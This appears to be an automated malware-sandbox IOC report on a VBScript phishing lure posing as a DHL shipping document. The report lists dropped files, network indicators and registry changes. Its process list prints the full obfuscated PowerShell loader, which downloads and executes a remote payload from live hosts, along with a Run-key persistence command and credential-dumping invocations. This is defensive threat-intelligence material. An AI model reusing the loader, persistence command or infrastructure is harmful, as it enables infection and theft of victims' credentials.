IOC Report
DHL Shipping Document Awb & BL.vbs

loading gif

Files

File Path
Type
Category
Malicious
DHL Shipping Document Awb & BL.vbs
ASCII text, with very long lines (2227), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs
data
dropped
malicious
C:\Users\user\AppData\Roaming\kpburtts.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gslda24.jeh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oogrjtkq.5mz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdzewvb3.idp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xk34jjgh.il5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhvB999.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x93162959, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\ycflhgp
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Proskriberes.Bet
ASCII text, with very long lines (65536), with no line terminators
dropped
There are 3 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet (Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet (Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet (Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4 SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,. T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne 'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet (Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet (Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet (Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4 SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,. T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne 'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
There are 7 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=P
unknown
https://moviesmacktalk.com/Nedslagnings.
unknown
https://moviesmacktalk.com/Nedsl
unknown
https://contemega.Pb)m
unknown
https://moviesmacktalk.c
unknown
http://www.imvu.comr
unknown
https://moviesmacktalk.com/Nedslagn
unknown
https://contemega.com.do/Nedslagning
unknown
https://aefd.nelreports.net/api/report?cat=bingth
unknown
https://contemega.com.d
unknown
https://contemega.com.do/Neds
unknown
https://contemega.c
unknown
https://contoso.com/License
unknown
https://moviesmacktalk.com/Nedslag
unknown
https://contemega.com.do/N
unknown
https://contemega.com.do/Nedslagnings.dwp
192.185.112.252
https://contemega.com.do
unknown
http://www.imvu.coma
unknown
http://www.nirsoft.net
unknown
https://aefd.nelreports.net/api/report?cat=bingaotak
unknown
https://contemega.com.do/Nedslagnings.d
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
https://contemega.com.do/Nedslagnin
unknown
https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d90046
unknown
https://moviesmacktalk.com/Neds
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
https://moviesmacktalk.com/Nedslagning
unknown
https://contemega.com.do/
unknown
https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16
unknown
https://www.google.com
unknown
https://moviesmacktalk.com/Nedslagnin
unknown
https://contemega.com.do/Nedslagnings.
unknown
https://contemega.com.do/Nedslagni
unknown
https://aka.ms/pscore6lB
unknown
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://moviesmacktalk.com/Nedslagni
unknown
https://contemega.com.
unknown
https://contemega.com.do/Nedsl
unknown
https://contemega.com.do/Nedslagnings.dw
unknown
https://login.yahoo.com/config/login
unknown
https://contemega.com.do/zPwwF47.binOptjsLanmoviesmacktalk.com/zPwwF47.bin
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://contemega.co
unknown
https://moviesmacktalk.com/
unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c&
unknown
https://moviesmacktalk.com/Nedslagnings.d
unknown
https://contemega.com.do/zPwwF47.bin
192.185.112.252
https://contemega.com.do/Nedsla
unknown
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
https://contemega.com.do/Nedslagn
unknown
https://contemega.com.do/Nedslag
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://microsoft.co
unknown
https://go.micro
unknown
https://moviesmacktalk.com/Ne
unknown
https://moviesmacktalk.com/Nedslagnings.dwpX
unknown
http://www.imvu.com
unknown
https://aefd.nelreports.net/api/report?cat=wsb
unknown
https://contoso.com/Icon
unknown
https://moviesmacktalk.co
unknown
https://moviesmacktalk.com/Nedslagnings
unknown
https://contemega.com.do/Ne
unknown
https://github.com/Pester/Pester
unknown
https://moviesmacktalk.com/N
unknown
https://moviesmacktalk.com/Nedslagnings.dw
unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b&
unknown
https://contemega.com.do/Ned
unknown
http://contemega.com.do
unknown
http://geoplugin.net/json.gp
178.237.33.50
https://contemega.com.do/Nedslagnings
unknown
https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877
unknown
http://crl.micro
unknown
https://aefd.nelreports.net/api/report?cat=bingaot
unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
unknown
https://aefd.nelreports.net/api/report?cat=bingrms
unknown
https://moviesmacktalk.com
unknown
https://www.google.com/accounts/servicelogin
unknown
https://moviesmacktalk.com/Nedsla
unknown
https://aka.ms/pscore68
unknown
https://contemega.com
unknown
https://moviesmacktalk.com/Ned
unknown
https://moviesmacktalk.com/Nedslagnings.dwp
unknown
http://www.ebuddy.com
unknown
There are 78 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
janbours92harbu02.duckdns.org
206.123.148.194
malicious
171.39.242.20.in-addr.arpa
unknown
malicious
geoplugin.net
178.237.33.50
contemega.com.do
192.185.112.252

IPs

IP
Domain
Country
Malicious
206.123.148.194
janbours92harbu02.duckdns.org
United States
malicious
178.237.33.50
geoplugin.net
Netherlands
192.185.112.252
contemega.com.do
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Fiberstof
Ufuldkommenheds
HKEY_CURRENT_USER\Environment
Udvalgenes215
HKEY_CURRENT_USER\SOFTWARE\jmoughoe-DMPW3B
exepath
HKEY_CURRENT_USER\SOFTWARE\jmoughoe-DMPW3B
licence
HKEY_CURRENT_USER\SOFTWARE\jmoughoe-DMPW3B
time
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
gstes
There are 13 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
90AD000
direct allocation
page execute and read and write
malicious
3BCD000
remote allocation
page execute and read and write
malicious
56B6000
heap
page read and write
22F4B000
stack
page read and write
87C0000
trusted library allocation
page read and write
1C22DB86000
heap
page read and write
3494000
heap
page read and write
D64000
heap
page read and write
56B6000
heap
page read and write
3044000
heap
page read and write
7FF887060000
trusted library allocation
page read and write
38AF000
heap
page read and write
224BE000
stack
page read and write
38A9000
heap
page read and write
D6B000
heap
page read and write
5D2000
heap
page read and write
7FF8870F0000
trusted library allocation
page read and write
1C22DBA0000
heap
page read and write
38D7000
heap
page read and write
1C22F81C000
heap
page read and write
56B6000
heap
page read and write
398A000
heap
page read and write
76A0000
trusted library allocation
page read and write
D74000
heap
page read and write
D60000
heap
page read and write
56B6000
heap
page read and write
3495000
heap
page read and write
8137000
stack
page read and write
38B8000
heap
page read and write
D7B000
heap
page read and write
7FF886F90000
trusted library allocation
page execute and read and write
5659000
heap
page read and write
1C22DB35000
heap
page read and write
1C22DB62000
heap
page read and write
D8B000
heap
page read and write
87F0000
direct allocation
page execute and read and write
6D3E000
stack
page read and write
76F0000
trusted library allocation
page read and write
137A8CD1000
trusted library allocation
page read and write
38A0000
heap
page read and write
56B6000
heap
page read and write
D5D000
heap
page read and write
334D000
heap
page read and write
3044000
heap
page read and write
565C000
heap
page read and write
137B132B000
heap
page read and write
22CD1000
heap
page read and write
1C22D9F0000
heap
page read and write
1C22DAFB000
heap
page read and write
38B8000
heap
page read and write
1C22DAEF000
heap
page read and write
30E0000
heap
page read and write
5E1000
heap
page read and write
690000
direct allocation
page read and write
38A5000
heap
page read and write
1C22DA9C000
heap
page read and write
2235E000
stack
page read and write
2EC4000
trusted library allocation
page read and write
38B8000
heap
page read and write
22C9D000
heap
page read and write
5651000
heap
page read and write
38A9000
heap
page read and write
38B5000
heap
page read and write
1C22DB7B000
heap
page read and write
56B6000
heap
page read and write
22F0A000
stack
page read and write
4F0000
heap
page read and write
1C22F82A000
heap
page read and write
38A1000
heap
page read and write
3DE000
unkown
page read and write
2CD0000
heap
page read and write
565F000
heap
page read and write
3494000
heap
page read and write
7750000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
854B000
heap
page read and write
1C22DB86000
heap
page read and write
D81000
heap
page read and write
8D37000
trusted library allocation
page read and write
1C22DB65000
heap
page read and write
4FC2000
trusted library allocation
page read and write
2968000
heap
page read and write
56B6000
heap
page read and write
6E80000
heap
page read and write
137B1100000
heap
page execute and read and write
75EF9FE000
stack
page read and write
38A1000
heap
page read and write
5850000
trusted library allocation
page read and write
7FF886FA2000
trusted library allocation
page read and write
38B8000
heap
page read and write
38A0000
heap
page read and write
6E80000
direct allocation
page read and write
1C22DB18000
heap
page read and write
D75000
heap
page read and write
227BB000
stack
page read and write
56B6000
heap
page read and write
710000
direct allocation
page read and write
3260000
heap
page read and write
D52000
heap
page read and write
6D75000
heap
page execute and read and write
22E3C000
heap
page read and write
874E000
stack
page read and write
137A8CB1000
trusted library allocation
page read and write
22C92000
heap
page read and write
38B8000
heap
page read and write
13797092000
heap
page read and write
233C9000
unclassified section
page execute and read and write
7FF886FF0000
trusted library allocation
page read and write
D47000
heap
page read and write
371C000
heap
page read and write
1C22DB90000
heap
page read and write
1C22DA90000
heap
page read and write
780000
direct allocation
page read and write
5980000
heap
page read and write
547B000
heap
page read and write
137B1167000
heap
page execute and read and write
2F79000
stack
page read and write
3040000
heap
page read and write
D70000
heap
page read and write
135000
heap
page read and write
2F10000
heap
page read and write
41B000
system
page execute and read and write
6EB0000
direct allocation
page read and write
D60000
heap
page read and write
2F08000
heap
page read and write
D86000
heap
page read and write
1C22FAC6000
heap
page read and write
3044000
heap
page read and write
1C22DBBB000
heap
page read and write
D71000
heap
page read and write
5CF000
heap
page read and write
5BBD000
heap
page read and write
5675000
heap
page read and write
5693000
heap
page read and write
D62000
heap
page read and write
7427000
heap
page read and write
1C22DAC9000
heap
page read and write
66E000
stack
page read and write
38AF000
heap
page read and write
1C22DB83000
heap
page read and write
7FF887010000
trusted library allocation
page read and write
1F3B2DD0000
heap
page read and write
5551000
heap
page read and write
980000
heap
page read and write
4F5F000
stack
page read and write
1C22DB6C000
heap
page read and write
579000
heap
page read and write
3146000
heap
page read and write
3880000
heap
page read and write
38BB000
heap
page read and write
D70000
heap
page read and write
38B8000
heap
page read and write
D7D000
heap
page read and write
22B7E000
stack
page read and write
D35000
heap
page read and write
1C22FAB2000
heap
page read and write
8280000
trusted library allocation
page read and write
22C38000
heap
page read and write
137B0FF0000
heap
page read and write
1C22DA98000
heap
page read and write
D70000
heap
page read and write
1C22DB35000
heap
page read and write
3140000
heap
page read and write
137994FE000
trusted library allocation
page read and write
5659000
heap
page read and write
5650000
heap
page read and write
223EC000
unkown
page read and write
82D0000
trusted library allocation
page read and write
D60000
heap
page read and write
73F9000
heap
page read and write
398B000
heap
page read and write
38A1000
heap
page read and write
7FF886FE0000
trusted library allocation
page read and write
3495000
heap
page read and write
2F2F000
stack
page read and write
38AE000
heap
page read and write
38B5000
heap
page read and write
7730000
trusted library allocation
page read and write
1C22DB09000
heap
page read and write
1C22DB8D000
heap
page read and write
3340000
heap
page read and write
38B8000
heap
page read and write
84CE000
stack
page read and write
2F05000
trusted library allocation
page execute and read and write
1379AA9E000
trusted library allocation
page read and write
2F00000
trusted library allocation
page read and write
1C22DB54000
heap
page read and write
400000
system
page execute and read and write
22AF0000
unclassified section
page execute and read and write
3688000
heap
page read and write
39424FF000
unkown
page read and write
13797210000
heap
page readonly
75EFEFE000
stack
page read and write
3494000
heap
page read and write
398A000
heap
page read and write
22C39000
heap
page read and write
1379AAAC000
trusted library allocation
page read and write
D5C000
heap
page read and write
3140000
heap
page read and write
2DAD000
stack
page read and write
1C22DB90000
heap
page read and write
D84000
heap
page read and write
3044000
heap
page read and write
2ED8000
heap
page read and write
D60000
heap
page read and write
137970B2000
heap
page read and write
1C22F832000
heap
page read and write
D8A000
heap
page read and write
5E2000
heap
page read and write
29EE000
stack
page read and write
2BFD000
stack
page read and write
727E000
stack
page read and write
1C22DB5A000
heap
page read and write
87A0000
trusted library allocation
page read and write
137971E0000
trusted library allocation
page read and write
46D0000
trusted library allocation
page read and write
D8C000
heap
page read and write
22E3C000
heap
page read and write
1379ABB8000
trusted library allocation
page read and write
22F70000
heap
page read and write
6C0000
direct allocation
page read and write
1C22F811000
heap
page read and write
38B8000
heap
page read and write
1C22F811000
heap
page read and write
D79000
heap
page read and write
5850000
trusted library allocation
page read and write
5850000
